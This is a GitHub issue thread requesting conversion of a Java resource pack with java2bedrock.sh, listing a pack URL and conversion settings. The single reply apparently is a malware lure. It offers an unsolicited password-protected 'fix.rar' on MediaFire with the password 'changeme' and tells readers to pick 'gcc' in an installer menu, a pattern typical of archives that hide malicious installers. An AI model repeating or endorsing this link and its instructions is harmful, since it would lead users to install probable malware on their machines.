### ISSUE TITLE
[Pack]: 

### ISSUE THREAD

**Issue by lolwhatdidigetbanned** [Kas-tle/java2bedrock.sh#33403]
### Java Pack Direct Download URL

https://cdn.smd.gg/uploads/files/9c639c279fc53fd9cd648fcae7b9db5c.zip

### Default Assets Version

None

### Block Material

double_sided

### Attachable Material

entity_alphablend

### Archive Scratch Files

None

### Rename Model Files

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
